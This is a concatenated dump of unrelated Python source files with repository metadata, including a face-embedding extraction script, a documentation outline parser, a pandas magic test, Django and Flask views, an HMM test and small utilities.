dir_list = glob.glob(lfw_test_cleaned_path + '*/*')
# Collect all rows first and build the frame once: DataFrame.append inside
# a loop was O(n^2) and has been removed in pandas >= 2.0.
rows = []
for fp in dir_list:
    # Paths look like "<...>/<gender>-<ethnicity>/<id>_<pose>.<ext>".
    my_dir, my_filename = os.path.split(fp)
    my_gender, my_ethnicity = my_dir.split('/')[-1].split('-')
    my_filename = my_filename.split('.')[0]
    tmp = my_filename.rfind('_')
    my_id = my_filename[0:tmp]           # everything before the last underscore
    my_pose = int(my_filename[tmp+1:])   # trailing pose index
    rows.append({'gender': my_gender, 'ethnicity': my_ethnicity,
                 'id': my_id, 'pose': my_pose, 'path': fp})
my_data = pd.DataFrame(rows, columns=my_column_names)
# Sort
my_data = my_data.sort_values(by=['id', 'pose'], ignore_index=True)
# Unique
id_unique = my_data['id'].unique()
# Check correction: every id must map to exactly one gender/ethnicity pair.
for id_u in id_unique:
    tmp = my_data[my_data['id'] == id_u][['gender', 'ethnicity']]
    if tmp['gender'].unique().size > 1 or tmp['ethnicity'].unique().size > 1:
        print(id_u)
# Initialise pretrained
# VGGFace ResNet-50 backbone; flatten the pooled output into a 2048-d vector.
pretrained_model = VGGFace(model = 'resnet50')
feature_layer = tf.keras.layers.Flatten(name='flatten')(pretrained_model.get_layer('avg_pool').output)
model = tf.keras.models.Model(pretrained_model.input, feature_layer)
# Detect face
exacted_data = np.empty((0, 2048))
detector = MTCNN()
for img_idx in range(0,my_data.shape[0]):
    print(str(img_idx))
    # Load image
    # cv2 loads BGR; MTCNN expects RGB.
    img = cv2.cvtColor(cv2.imread(my_data['path'][img_idx]), cv2.COLOR_BGR2RGB)
    faces = detector.detect_faces(img)
    # Select biggest face
    face_idx = 0
    if len(faces) > 1:
        facesize = []
        for face in faces:
            _, _, width, height = face['box']
            facesize.append(width*height)
        face_idx = np.argmax(facesize)
    # Crop face
    # Clamp negative box coordinates to the image border before slicing.
    bbox = np.array(faces[face_idx]['box'])
    bbox[bbox<0] = 0
    x1, y1, width, height = bbox
    x2, y2 = x1 + width, y1 + height
    img = img[y1:y2, x1:x2]
    # Convert color space
    img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
    # Extract feature by pretrained
    img = cv2.resize(img, (224,224))
    img = tf.keras.preprocessing.image.img_to_array(img)
    img = np.expand_dims(img, axis=0)
    img = utils.preprocess_input(img, version=2) # vgg = 1, resnet = 2
    feature_embedding = model.predict(img)
    exacted_data = np.vstack((exacted_data, feature_embedding))
    # Save img
    # cv2.imwrite((lfw_test_crop_face_path + '/' + my_data.id.iloc[img_idx] + '_' + str(my_data.pose.iloc[img_idx]).zfill(4)) + '.jpg', img)
# Concatenate
# Append feature_1..feature_2048 columns to the metadata frame.
my_data_columns = my_column_names
my_data_columns = np.array(my_data_columns)
my_data_columns = np.append(my_data_columns, np.char.add(np.tile('feature_', (2048)), np.array(range(1, 2048+1)).astype('U')))
my_data = np.concatenate((my_data.values, exacted_data), axis=1)
my_data = pd.DataFrame(my_data, columns=my_data_columns)
# Save
my_data.to_csv('DevTest_cleaned.txt', header=True, index=False, sep=' ')
print()
| UTF-8 | Python | false | false | 4,195 | py | 55 | testscript_11.py | 52 | 0.626222 | 0.610727 | 0 | 129 | 31.51938 | 155 |
coreygirard/harbor | 1,374,389,557,538 | 8875bbcb2bd4c9233439d324a82aa844ff0ef69f | 7725ec91175db3e86edf0c5396f0b0dcc680ada1 | /harbor/src/outline.py | 21269e9c931db22a31f2a55923030bd0a170582a | [] | no_license | https://github.com/coreygirard/harbor | c4bf7829cd3cf5dca61f437321912c90a5a9988c | 6ab255562e200eb47f6262e48e0b55978d83fd59 | refs/heads/master | 2021-09-28T16:29:14.407065 | 2018-11-18T08:16:56 | 2018-11-18T08:16:56 | 113,496,312 | 8 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''harbor: readme/how/outline
{
OUTLINE
readme: README.md
badges
what
why
how
intro
outline
patterns
todo
PATTERNS
title:
# {title}
section:
### {section}
}[code]
{The outline section of the `.harbor` file must be preceded by `OUTLINE`.
This section specifies the names of the files to be generated, and their internal
structure}[p]
'''
def extractOutline(text):
    """Return only the OUTLINE section from a list of .harbor lines.

    The section is everything after an 'OUTLINE' marker line and before a
    'PATTERNS' marker line; either marker may be absent but may appear at
    most once.

    >>> extractOutline(['OUTLINE', 'aaa', 'PATTERNS', 'bbb'])
    ['aaa']
    """
    assert text.count('OUTLINE') <= 1
    assert text.count('PATTERNS') <= 1

    section = text
    if 'OUTLINE' in section:
        # Drop everything up to and including the marker itself.
        section = section[section.index('OUTLINE') + 1:]
    if 'PATTERNS' in section:
        section = section[:section.index('PATTERNS')]
    return section


'''harbor: readme/how/outline
{Each line in the `OUTLINE` section without indentation denotes a file. The form is `aaa: bbb`,
where `aaa` is the nickname for the file, and `bbb` is the actual filename to use when saving
the generated documentation.}[p]

{Basic outline indentation rules apply, with regard to how nesting works. The sections can have
arbitrary names, excluding spaces. Best practice for multi-word sections is Lisp-style naming:
`another-section` or `this-is-a-wordy-label`.}[p]
'''


def getOutline(i):
    """Build a {filename: [section paths]} map from harbor OUTLINE sections.

    *i* is an iterable of files, each given as a list of lines.  Unindented
    lines have the form 'nickname: filename' and start a new output file;
    indented lines (two spaces per level) name nested sections, which are
    joined into slash-separated paths.

    >>> getOutline([['OUTLINE', 'doc: out.md', '  intro']])
    {'out.md': ['doc', 'doc/intro']}
    """
    lines = []
    for chunk in i:
        lines.extend(extractOutline(chunk))

    filenames = {}
    stack = {}
    for raw in lines:
        if raw.strip() == '':
            continue
        # Depth is measured before stripping; levels are two spaces wide.
        depth = len(raw) - len(raw.lstrip())
        assert depth % 2 == 0
        entry = raw.strip()
        if depth == 0:
            # "nickname: filename" opens a new documentation file.
            entry, current_file = entry.split(' ')
            entry = entry.strip(':')
            filenames[current_file] = []
        # Record this entry at its depth and discard anything deeper.
        stack[depth] = entry
        stack = {k: v for k, v in stack.items() if k <= depth}
        path = '/'.join(stack[k] for k in sorted(stack))
        filenames[current_file].append(path)
    return filenames
| UTF-8 | Python | false | false | 3,148 | py | 19 | outline.py | 14 | 0.435197 | 0.431385 | 0 | 120 | 25.225 | 95 |
RiskIQ/msticpy | 10,488,310,144,212 | 6e074d0ba4b9b69fdaae8da88c6bbd6723070bd4 | 373cd41477438cc8826cd2a2f8689be84f486339 | /tests/datamodel/test_txt_df_magic.py | baf52606e5003c930809ff733806e64c924c83ef | [
"LicenseRef-scancode-generic-cla",
"LGPL-3.0-only",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown",
"ISC",
"LGPL-2.0-or-later",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"LGPL-2.1-only",
"Unlicense",
"Python-2.0",
"LicenseRef-scancode-python-cwi",
"MIT",
"LGPL-2.1-or-later",
"GPL-2.0-or-later",
"HPND",
"ODbL-1.0",
"GPL-1.0-or-later",
"MPL-2.0"
] | permissive | https://github.com/RiskIQ/msticpy | cd42d601144299ec43631554076cc52cbb42dc98 | 44b1a390510f9be2772ec62cb95d0fc67dfc234b | refs/heads/master | 2023-08-27T00:11:30.098917 | 2021-06-17T22:54:29 | 2021-06-17T22:54:29 | 374,787,165 | 1 | 0 | MIT | true | 2021-09-16T19:05:43 | 2021-06-07T20:05:09 | 2021-07-29T16:04:07 | 2021-09-16T19:05:41 | 23,582 | 1 | 0 | 0 | Python | false | false | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""Test Text to DF magic."""
import pandas as pd
import pytest_check as check
from msticpy.datamodel.pivot_magic_core import run_txt2df
__author__ = "Ian Hellen"
# pylint: disable=redefined-outer-name
_INPUT_TEST = """
file, lines1, lines2, lines3, percent
msticpy___init__.py, 24, 12, 0, 50%
msticpy__version.py, 1, 0, 0, 100%
msticpy_analysis___init__.py, 3, 0, 0, 100%
msticpy_analysis_anomalous_sequence___init__.py, 3, 0, 0, 100%
msticpy_analysis_anomalous_sequence_anomalous.py, 34, 26, 0, 24%
msticpy_analysis_anomalous_sequence_model.py, 222, 196, 0, 12%
msticpy_analysis_anomalous_sequence_sessionize.py, 59, 52, 0, 12%
msticpy_analysis_anomalous_sequence_utils___init__.py, 3, 0, 0, 100%
msticpy_analysis_anomalous_sequence_utils_cmds_only.py, 76, 63, 0, 17%
msticpy_analysis_anomalous_sequence_utils_cmds_params_only.py, 105, 91, 0, 13%
msticpy_analysis_anomalous_sequence_utils_cmds_params_values.py, 126, 111, 0, 12%
msticpy_analysis_anomalous_sequence_utils_data_structures.py, 27, 16, 0, 41%
msticpy_analysis_anomalous_sequence_utils_laplace_smooth.py, 34, 28, 0, 18%
msticpy_analysis_anomalous_sequence_utils_probabilities.py, 42, 35, 0, 17%
"""
# Magic args
# "--sep",
# "--name",
# "--headers",
# "--keepna",
def test_txt2df():
    """Test txt2df magic function.

    Exercises run_txt2df end to end: default parsing, --headers, --sep,
    malformed rows with and without --keepna, trailing empty columns,
    and --name exporting the frame into the caller's namespace.
    """
    # No args: the header line is treated as data, so 15 rows x 5 cols.
    res_df = run_txt2df(line="", cell=_INPUT_TEST, local_ns=None)
    check.is_instance(res_df, pd.DataFrame)
    check.equal(res_df.shape, (15, 5))
    # headers - the first input line becomes the column index (14 data rows)
    res_df = run_txt2df(line="--headers", cell=_INPUT_TEST, local_ns=None)
    check.is_instance(res_df, pd.DataFrame)
    check.equal(res_df.shape, (14, 5))
    for col in _INPUT_TEST.split("\n")[1].split(","):
        check.is_in(col.strip(), list(res_df.columns))
    # separator - same table, tab-delimited, parsed via --sep
    res_df = run_txt2df(
        line="--headers --sep=\t", cell=_INPUT_TEST.replace(",", "\t"), local_ns=None
    )
    check.is_instance(res_df, pd.DataFrame)
    check.equal(res_df.shape, (14, 5))
    # some malformed lines - append a trailing comma to lines whose
    # index % 5 != 3, creating an extra (empty) column on those lines only
    cell_input = []
    for idx, line in enumerate(_INPUT_TEST.split("\n")):
        if line and idx % 5 != 3:
            cell_input.append(line + ",")
        else:
            cell_input.append(line)
    res_df = run_txt2df(line="--headers", cell="\n".join(cell_input), local_ns=None)
    # expect output with dropped columns (the empty extra column is removed)
    check.is_instance(res_df, pd.DataFrame)
    check.equal(res_df.shape, (14, 5))
    res_df = run_txt2df(
        line="--headers --keepna", cell="\n".join(cell_input), local_ns=None
    )
    # expect output with no dropped columns (--keepna retains the empty one)
    check.is_instance(res_df, pd.DataFrame)
    check.equal(res_df.shape, (14, 6))
    # add extra delimiters for 2 empty columns on every non-blank line
    cell_input = [line + ", ," for line in _INPUT_TEST.split("\n") if line]
    res_df = run_txt2df(
        line="--headers --keepna", cell="\n".join(cell_input), local_ns=None
    )
    # expect output with cols following header row
    check.is_instance(res_df, pd.DataFrame)
    check.equal(res_df.shape, (14, 7))
    for col in ("Unnamed: 5", "Unnamed: 6"):
        check.is_in(col.strip(), list(res_df.columns))
    # keepna should force blank columns to remain (no --headers: 15 rows)
    res_df = run_txt2df(line="--keepna", cell="\n".join(cell_input), local_ns=None)
    check.is_instance(res_df, pd.DataFrame)
    check.equal(res_df.shape, (15, 7))
    # name - also bind the resulting frame to "my_df" in the namespace
    namespace = {}
    res_df = run_txt2df(
        line="--headers --name=my_df", cell=_INPUT_TEST, local_ns=namespace
    )
    check.is_instance(res_df, pd.DataFrame)
    check.equal(res_df.shape, (14, 5))
    check.is_in("my_df", namespace)
    check.is_instance(namespace["my_df"], pd.DataFrame)
    check.equal(namespace["my_df"].shape, (14, 5))
| UTF-8 | Python | false | false | 3,973 | py | 374 | test_txt_df_magic.py | 244 | 0.627234 | 0.590486 | 0 | 105 | 36.838095 | 85 |
dillan08/PAT | 781,684,062,325 | 08e87b9bdd29e7d1b764f9b07d92253075c6a074 | 5528290429e3e98be841dc8a8ea504aa657f0187 | /interesesCRUD/views.py | e8c553c895fefe3dd57a29fd08f1766b37a34d77 | [] | no_license | https://github.com/dillan08/PAT | ac8973c2ccd9efbd8692bce4173dfc3e307e5a5a | 39a75bc2a29bcaf7457c886989f291623dcd465d | refs/heads/development | 2020-09-15T01:44:55.021752 | 2016-10-21T13:29:08 | 2016-10-21T13:29:08 | 67,364,883 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework import status
from interesesCRUD.serializer import InteresSerializer
from nucleo.models import Interes
# Create your views here.
class InteresVS(viewsets.ModelViewSet):
serializer_class = InteresSerializer
queryset = Interes.objects.all()
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
| UTF-8 | Python | false | false | 701 | py | 37 | views.py | 36 | 0.758916 | 0.754636 | 0 | 19 | 35.842105 | 89 |
cccgp/Machine-Learning-Algorithms | 7,206,955,150,475 | 5f190bacf4f98973372152479e50f67ffa0e52eb | 105683b026cee117aa6d684b7450b3bb0d83094e | /hmm/tests/test_hmm.py | 41b174adbc4152748a5e2ef878a1ad9b1679cffa | [] | no_license | https://github.com/cccgp/Machine-Learning-Algorithms | 72debf53e89f4223ff45ebd3ca68587e39632d1e | ea1768ffc23f9ffb2d46172eb12c036f28ee09e6 | refs/heads/master | 2020-04-24T18:03:42.579276 | 2019-02-28T03:18:02 | 2019-02-28T03:18:02 | 172,168,321 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
from hmm.hmm import Hmm
import time
def test_hmm():
    """Smoke-test Hmm.forward and Hmm.vibiter on a 3-state, 2-symbol model."""
    transition = np.array([[0.5, 0.2, 0.3], [0.3, 0.5, 0.2], [0.2, 0.3, 0.5]])
    emission = np.array([[0.5, 0.5], [0.4, 0.6], [0.7, 0.3]])
    initial = np.array([0.2, 0.4, 0.4])
    observations = np.array([0, 1, 0])
    model = Hmm()
    model.forward(transition, emission, initial, observations)
    model.vibiter(transition, emission, initial, observations)
if __name__ == '__main__':
    # Time the smoke test and report the duration; previously `end` was
    # computed but never used, so the measurement was discarded.
    start = time.time()
    test_hmm()
    end = time.time()
    print('test_hmm finished in %.3f s' % (end - start))
| UTF-8 | Python | false | false | 452 | py | 17 | test_hmm.py | 16 | 0.462389 | 0.376106 | 0 | 20 | 20.6 | 69 |
Sergey-Laznenko/Stepik | 6,880,537,646,653 | c7c6b0dedae60d9d54c88dc2bd58a64d326b0447 | f7463bd0ab18b41611d5ac725f65d3db3a3a7a1d | /Generation Python - A Beginner's Course/13_Functions/13.4(return)/6.py | 935283dad1bd12b2d645cfb70defe4c8b60e6d5c | [] | no_license | https://github.com/Sergey-Laznenko/Stepik | f81c5aeead3fbd20628129d60ccce92b34724b97 | 5e1a1a76c3f6ed487cf8fc847913c890c8eac840 | refs/heads/master | 2022-12-28T19:01:48.670540 | 2020-10-18T15:23:58 | 2020-10-18T15:23:58 | 279,022,462 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Напишите функцию convert_to_miles(km), которая принимает в качестве аргумента расстояние в километрах
и возвращает расстояние в милях.
"""
def convert_to_miles(km):
    """Convert a distance in kilometres to (approximate) miles."""
    miles_per_km = 0.6214
    return km * miles_per_km
# Read a whole-number distance in kilometres and print it in miles.
kilometres = int(input())
print(convert_to_miles(kilometres))
| UTF-8 | Python | false | false | 341 | py | 299 | 6.py | 298 | 0.729508 | 0.709016 | 0 | 12 | 19.333333 | 101 |
rnlascano/PyMonitorMQTT | 2,473,901,179,691 | 33f9b7682705b5204739d6236b545afc16525e48 | b74c7f4cb3a460566e43b476e19b080eb93cc85f | /Sensors/RamSensor/RamSensor.py | ec07b9e9756583e4bb3ed1e1daee7fa47954a560 | [] | no_license | https://github.com/rnlascano/PyMonitorMQTT | 37e87fe7748ef0476b5c425ea50f5169adcfe578 | c991a130bec808c16a0c02959cce379e3adef6fb | refs/heads/master | 2022-12-05T01:18:24.762188 | 2020-08-31T19:50:46 | 2020-08-31T19:50:46 | 291,809,554 | 0 | 0 | null | true | 2020-08-31T19:50:47 | 2020-08-31T19:46:04 | 2020-08-31T19:46:06 | 2020-08-31T19:50:46 | 817 | 0 | 0 | 0 | null | false | false | import psutil
from Sensors.Sensor import Sensor
TOPIC_RAM_PERCENTAGE = 'ram_used_percentage'
class RamSensor(Sensor):
def Initialize(self):
self.AddTopic(TOPIC_RAM_PERCENTAGE)
def Update(self):
self.SetTopicValue(TOPIC_RAM_PERCENTAGE, self.GetSystemRam())
def GetSystemRam(self):
return psutil.virtual_memory()[2]
| UTF-8 | Python | false | false | 356 | py | 15 | RamSensor.py | 13 | 0.707865 | 0.705056 | 0 | 16 | 21.25 | 69 |
extreme-developers/ShoppingOnline | 6,176,163,013,801 | 02685eea4e054c6dd198f6cb3e56eb851c0da1c7 | 356bbc95f450735840b5be1fffabc67d300f607a | /apps/mobiles/migrations/0005_typicalspecification_wifi.py | 80b24616892e319a81710a0a5c55d4c6ed11bafb | [] | no_license | https://github.com/extreme-developers/ShoppingOnline | fb78be9ccd998e06143a890bbd68ba09b23c12f9 | d4606315f1c2ee29e30a1cb47ee5dac3a3d640ac | refs/heads/master | 2020-06-10T01:33:58.642777 | 2018-03-08T12:51:00 | 2018-03-08T12:57:32 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2017-10-17 09:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mobiles', '0004_auto_20171017_0843'),
]
operations = [
migrations.AddField(
model_name='typicalspecification',
name='wifi',
field=models.IntegerField(choices=[(1, '支持'), (2, '不支持')], default=1, verbose_name='WIFI'),
),
]
| UTF-8 | Python | false | false | 523 | py | 138 | 0005_typicalspecification_wifi.py | 92 | 0.596491 | 0.528265 | 0 | 20 | 24.65 | 103 |
yiziqi/vega | 249,108,142,850 | 5f4b681f5556dc4ae36768d60652d48500413922 | 6bd21a64c5fbeba1682c3e65221f6275a44c4cd5 | /vega/networks/__init__.py | 9059f749e06ac4778ff9da8bcc68db5b581fcf33 | [
"MIT"
] | permissive | https://github.com/yiziqi/vega | e68935475aa207f788c849e26c1e86db23a8a39b | 52b53582fe7df95d7aacc8425013fd18645d079f | refs/heads/master | 2023-08-28T20:29:16.393685 | 2021-11-18T07:28:22 | 2021-11-18T07:28:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Import and register network automatically."""
from vega.common.class_factory import ClassFactory
from .network_desc import NetworkDesc
# Register the network classes exposed by each vega.networks submodule
# (module name -> class names); presumably imported lazily on first use
# by ClassFactory - see ClassFactory.lazy_register.
ClassFactory.lazy_register("vega.networks", {
    "adelaide": ["AdelaideFastNAS"],
    "bert": ["BertClassification", "TinyBertForPreTraining", "BertClassificationHeader"],
    "dnet": ["DNet", "DNetBackbone", "EncodedBlock"],
    "erdb_esr": ["ESRN"],
    "faster_backbone": ["FasterBackbone"],
    "faster_rcnn": ["FasterRCNN"],
    "mobilenet": ["MobileNetV3Tiny", "MobileNetV2Tiny"],
    "mobilenetv3": ["MobileNetV3Small", "MobileNetV3Large"],
    "necks": ["FPN"],
    "quant": ["Quantizer"],
    "resnet_det": ["ResNetDet"],
    "resnet_general": ["ResNetGeneral"],
    "resnet": ["ResNet"],
    "resnext_det": ["ResNeXtDet"],
    "sgas_network": ["SGASNetwork"],
    "simple_cnn": ["SimpleCnn"],
    "spnet_backbone": ["SpResNetDet"],
    "super_network": ["DartsNetwork", "CARSDartsNetwork", "GDASDartsNetwork"],
    "text_cnn": ["TextCells", "TextCNN"],
    "gcn": ["GCN"],
    "vit": ["VisionTransformer"],
    "mtm_sr": ["MtMSR"],
    "unet": ["Unet"]
})
def register_networks(backend):
    """Import and register network automatically.

    The backend subpackage is imported purely for its import-time side
    effects (the module body performs the registrations). Unknown backend
    names fall through all branches and are silently ignored.
    """
    if backend == "pytorch":
        from . import pytorch
    elif backend == "tensorflow":
        from . import tensorflow
    elif backend == "mindspore":
        from . import mindspore
| UTF-8 | Python | false | false | 1,821 | py | 217 | __init__.py | 197 | 0.660077 | 0.654585 | 0 | 50 | 35.42 | 89 |
harrylee0810/TIL-c9 | 6,107,443,514,638 | 9fb23a2fe750fdd680bfe31d8f9f1ed0d81858cf | bb193c259e7efd696921496b92ec45dfdf3fe5a1 | /django/auth/posts/admin.py | 014a0dc9c082b3bd771df69a635927566165c6c7 | [] | no_license | https://github.com/harrylee0810/TIL-c9 | 6f6526ac03690d29fb278f5c7903f90c254a510b | 4a811e20d9ae9df17cf41c33047e4c876cacc8a8 | refs/heads/master | 2020-04-17T17:18:15.261578 | 2019-02-12T08:59:29 | 2019-02-12T08:59:29 | 166,777,152 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib import admin
from .models import Post, Comment
# (translated) TODO: customize the admin page so the post content is visible too.
class PostAdmin(admin.ModelAdmin):
    # Columns shown in the admin change-list for Post.
    list_display = ('title','content','created_at','updated_at',)
# Register your models here.
admin.site.register(Post, PostAdmin)
admin.site.register(Comment)
zjulyx/LeetCodePython | 2,276,332,684,502 | 7bd8021086d7ffb64013d31d27be4850b291826c | ccb288ffd441565d6dd40de7746325d51b7722d5 | /Medium/面试题 08.14. 布尔运算.py | b0e7861d10b0e5739a33b7aab4ab89b3dfc618d4 | [] | no_license | https://github.com/zjulyx/LeetCodePython | 1dfbe765859dc90a13d2db2629bbbbd025bea94c | 8953a8f7db215df169691b411e7eba47e5ac3632 | refs/heads/master | 2020-03-26T21:53:25.716728 | 2020-03-26T10:40:04 | 2020-03-26T10:40:04 | 145,415,356 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # 给定一个布尔表达式和一个期望的布尔结果 result,布尔表达式由 0 (false)、1 (true)、& (AND)、 | (OR) 和 ^ (XOR) 符号组成。实现一个函数,算出有几种可使该表达式得出 result 值的括号方法。
# 示例 1:
# 输入: s = "1^0|0|1", result = 0
# 输出: 2
# 解释: 两种可能的括号方法是
# 1^(0|(0|1))
# 1^((0|0)|1)
# 示例 2:
# 输入: s = "0&0&0&1^1|0", result = 1
# 输出: 10
# 提示:
# 运算符的数量不超过 19 个
# 通过次数65提交次数169
# 来源:力扣(LeetCode)
# 链接:https://leetcode-cn.com/problems/boolean-evaluation-lcci
# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
class Solution:
def countEval(self, s: str, result: int) -> int:
# 分治法, cal返回当前表达式0和1的数目
# 对于每个操作符, 分别计算其左右表达式的0和1的数目, 然后根据操作符本身得到当前操作符的对应的0和1的数目
# 使用一个字典将结果保存下来加速运算
d = {}
def cal(s):
if len(s) == 1:
return (1 - int(s), int(s))
if s in d:
return d[s]
cur0, cur1 = 0, 0
for i in range(1, len(s)):
if s[i] == '&' or s[i] == '|' or s[i] == '^':
l0, l1 = cal(s[0:i])
r0, r1 = cal(s[i + 1:])
if s[i] == '&':
cur0 += l0 * r0 + l0 * r1 + l1 * r0
cur1 += l1 * r1
elif s[i] == '|':
cur0 += l0 * r0
cur1 += l1 * r1 + l0 * r1 + l1 * r0
else:
cur0 += l0 * r0 + l1 * r1
cur1 += l0 * r1 + l1 * r0
d[s] = (cur0, cur1)
return d[s]
return cal(s)[result]
if __name__ == '__main__':
try:
print(Solution().countEval(s="1^0", result=0)) # or Execute()
print(Solution().countEval(s="1^0|0", result=0)) # or Execute()
print(Solution().countEval(s="1^0|0|1", result=1)) # or Execute()
print(Solution().countEval(s="0&0&0&1^1|0", result=0)) # or Execute()
except Exception as err:
print(err)
| UTF-8 | Python | false | false | 2,393 | py | 787 | 面试题 08.14. 布尔运算.py | 784 | 0.430269 | 0.37655 | 0 | 64 | 28.25 | 121 |
King-Of-Game/Python | 17,154,099,400,376 | 6a6001c98f3f8ee05081bd7e1c0074b0663510c6 | 36afa271f080459adf1014cd23f4be9f954dfee6 | /Example/date/生成日历.py | 356d0d16c377d1ae4ad432132a237cf0249658d6 | [] | no_license | https://github.com/King-Of-Game/Python | b69186a7574ce1c0b7097207cfe9a2eb38a90bc0 | 643b9fd22efd78f6679735f23432943a57b5f5bb | refs/heads/master | 2023-05-25T05:35:14.473114 | 2021-10-24T12:52:21 | 2021-10-24T12:52:21 | 151,251,434 | 3 | 0 | null | false | 2023-05-01T20:51:50 | 2018-10-02T12:34:04 | 2021-10-24T12:52:41 | 2023-05-01T20:51:50 | 90,134 | 1 | 0 | 3 | HTML | false | false | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# __author__ : YiXuan
# __date__ : 1/17/2021 1:15 PM
# __software__ : PyCharm
'''
Generate a calendar using the built-in module: calendar
'''
import calendar
# Interactive calendar generator (note: "Calender" spelling kept for callers).
def generateCalender():
    """Repeatedly prompt for a year and month and print that month's calendar.

    Entering 'q' or 'Q' at the first prompt exits the loop; non-numeric
    year/month input is reported and the loop continues.
    """
    while True:
        choice = input('***日历(输入q退出)***\n:')
        if choice in ('q', 'Q'):
            break
        try:
            year = int(input('请输入年份: '))
            month = int(input('请输入月份: '))
            print(calendar.month(year, month))
        except ValueError:
            print('请输入合法的年份和月份!')
if __name__ == '__main__':
    # Run the interactive loop only when executed as a script.
    generateCalender()
| UTF-8 | Python | false | false | 701 | py | 250 | 生成日历.py | 213 | 0.497512 | 0.477612 | 0 | 34 | 16.735294 | 47 |
kate-melnykova/Scientific-functions | 163,208,790,147 | 6578105d74c3193e99407a39c6a97ee5a75c1cd5 | f965d7db19fb8e032fa1b7dc028522a47ba9307d | /calcs/main.py | abd5bd45206521e35f0de41ede9eeeb88f5b68b0 | [] | no_license | https://github.com/kate-melnykova/Scientific-functions | 8da976a45933ac062404ae1ef957c336388a302a | 697cedf42845efddd4d7ebc92d4237604df9014d | refs/heads/master | 2020-06-05T09:33:29.463310 | 2019-09-07T05:36:44 | 2019-09-07T05:36:44 | 192,393,110 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from time import time
from flask import Blueprint
from flask import flash
from flask import url_for
from flask import redirect
from flask import request
from flask import render_template
from flask_login import LoginManager, UserMixin, login_required,\
login_user, logout_user, current_user
import json
from redis import Redis
from factory_app import factory_app
from redispy import get_connection
from views.auth import User
from views.auth.login_form import auth
from sci_funcs.tasks import args_to_function
from sci_funcs.function_registry import function_registry
# Build the Flask app and the Celery instance from the application factory.
app, celery = factory_app()
######
# LoginManager setup
######
# Attach Flask-Login to the app; the user_loader callback is defined below.
login_manager = LoginManager()
login_manager.init_app(app)
@login_manager.user_loader
def user_loader(username):
    """Flask-Login callback: rebuild a User from the user DB, or None."""
    raw = get_connection(db=app.config['USER_DB']).get(username)
    return None if raw is None else User.deserialize(raw)


# Mount the authentication blueprint (login/logout routes).
app.register_blueprint(auth)
@app.route('/', methods=['GET'])
@app.route('/index', methods=['GET'])
def index():
    """Render the landing page (served at both / and /index)."""
    # Debug trace of the current (possibly anonymous) user.
    print(f'Current user on index page {current_user}')
    return render_template('index.html')
@app.route('/schedule_calculation', methods=['POST'])
def schedule_calculation():
    """Queue a Celery calculation, or flash a raw expression, then redirect.

    For a registered function, the declared argument names (registry entry
    minus its first slot) are read from the form, the task is dispatched,
    and a PENDING record is stored in the calcs DB under Celery's result
    key. Any other func_name must be 'expression', which is only echoed.
    """
    assert request.method == 'POST'  # route already restricts to POST
    func_name = request.form['func_name']
    if func_name in function_registry:
        arguments = dict()
        arguments['func_name'] = func_name
        arguments['status'] = 'IN PROGRESS'
        arguments['start_time'] = time()
        for item in function_registry[func_name][1:]:
            arguments[item] = request.form[item]
        # (A previously discarded bare get_connection() call was removed
        # here as a no-op; the connection used below is obtained then.)
        async_result = args_to_function.delay(arguments, function_registry[func_name][1:])
        message = json.dumps({"status": "PENDING",
                              "result": arguments,
                              "task_id": async_result.task_id
                              })
        # Same key pattern Celery uses for its result backend entries.
        get_connection(db=app.config['CALCS_DB']).set(f'celery-task-meta-{async_result.task_id}',
                                                      message)
        return redirect(url_for('view_results'))
    else:
        assert func_name == 'expression'
        # BUG FIX: request.form is a MultiDict with no attribute-style
        # access - `request.form.expression` raised AttributeError.
        expression = request.form['expression']
        flash(f'Submitted {expression}')
        return redirect(url_for('index'))
@app.route('/view_results', methods=['GET'])
def view_results():
    """List every stored calculation, keyed by its Celery task id."""
    connection = get_connection(db=app.config['CALCS_DB'])
    results = {}
    for key in connection.keys('*'):
        record = json.loads(connection.get(key))
        results[record['task_id']] = record['result']
    return render_template('view_results.html',
                           results=results)
@app.route('/result', methods=['GET'])
@login_required
def view_specific_results():
    """Render the per-function detail template for one task (?task_id=...)."""
    task_id = str(request.args.get('task_id', ''))
    key = str.encode(f'celery-task-meta-{task_id}')
    try:
        result = json.loads(get_connection(db=app.config['CALCS_DB']).get(key))
    except Exception:
        # Was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt; keep the best-effort behaviour (missing key
        # yields json.loads(None) -> TypeError) but catch Exception only.
        flash('Task not found')
        return redirect(url_for('index'))
    result = result['result']
    # Template name is derived from the stored function name.
    return render_template(f'{ result["func_name"] }.html',
                           result=result)
"""
next = flask.request.args.get('next')
# is_safe_url should check if the url is safe for redirects.
# See http://flask.pocoo.org/snippets/62/ for an example.
if not is_safe_url(next):
return flask.abort(400)
return flask.redirect(next or flask.url_for('index'))
# handle login failed
